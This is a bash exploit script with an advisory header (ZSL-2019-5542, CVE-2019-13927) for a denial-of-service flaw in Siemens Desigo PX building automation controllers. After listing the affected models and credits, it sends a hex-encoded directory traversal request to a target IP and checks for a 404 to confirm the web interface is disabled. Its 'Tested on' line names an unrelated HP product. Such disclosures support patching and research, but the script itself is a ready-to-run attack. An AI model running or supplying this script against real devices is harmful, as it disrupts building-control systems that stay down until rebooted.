Share
#!/bin/bash  
#  
#  
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit  
#  
#  
# Vendor: Siemens AG  
# Vendor web page: https://www.siemens.com  
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html  
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D  
# With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2  
# All firmware versions < V6.00.320  
# ------  
# Model: PXC00-U, PXC64-U, PXC128-U  
# With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2  
# All firmware versions < V6.00.320  
# ------  
# Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D  
# With activated web server  
# All firmware versions < V6.00.320  
#  
# Summary: Desigo PX is a modern building automation and control  
# system for the entire field of building service plants. Scalable  
# from small to large projects with highest degree of energy efficiency,  
# openness and user-friendly operation.  
#  
# Desc: The device contains a vulnerability that could allow an attacker  
# to cause a denial of service condition on the device's web server  
# by sending a specially crafted HTTP message to the web server port  
# (tcp/80). The security vulnerability could be exploited by an attacker  
# with network access to an affected device. Successful exploitation  
# requires no system privileges and no user interaction. An attacker  
# could use the vulnerability to compromise the availability of the  
# device's web service. While the device itself stays operational, the  
# web server responds with HTTP status code 404 (Not found) to any further  
# request. A reboot is required to recover the web interface.  
#  
# Tested on: HP StorageWorks MSL4048 httpd  
#  
# ================================================================================  
# Expected result after sending the directory traversal sequence: /dir?dir=../../:  
# --------------------------------------------------------------------------------  
#  
# $ curl http://10.0.0.17/index.htm  
# <HEAD><TITLE>404 Not Found</TITLE></HEAD>  
# <BODY><H1>404 Not Found</H1>  
# Url '/INDEX.HTM' not found on server<P>  
# </BODY>  
#  
# ================================================================================  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# Zero Science Lab - https://www.zeroscience.mk  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2019-5542  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php  
#  
# Vendor ID: SSA-898181  
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802  
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf  
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt  
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html  
#  
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter  
# CWE URL: https://cwe.mitre.org/data/definitions/472.html  
# CVE ID: CVE-2019-13927  
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927  
# CVSS v3.1 Base Score: 5.3  
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C  
#  
#  
# 06.06.2019  
#  
  
  
echo -ne "\n----------------------------------"  
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"  
echo -ne "\n----------------------------------\n"  
if [ "$#" -ne 1 ]; then  
echo -ne "\nUsage: $0 [ipaddr]\n\n"  
exit  
fi  
IP=$1  
TARGET="http://$IP/"  
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`  
echo -ne "\n[+] Sending payload to $IP on port 80."  
curl -s "$TARGET$PAYLOAD" > /dev/null  
echo -ne "\n[*] Done"  
echo -ne "\n[+] Checking if exploit was successful..."  
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')  
if [ "$status" == "404" ]; then  
echo -ne "\n[*] Exploit successful!\n"  
else  
echo -ne "\n[-] Exploit unsuccessful.\n"  
exit  
fi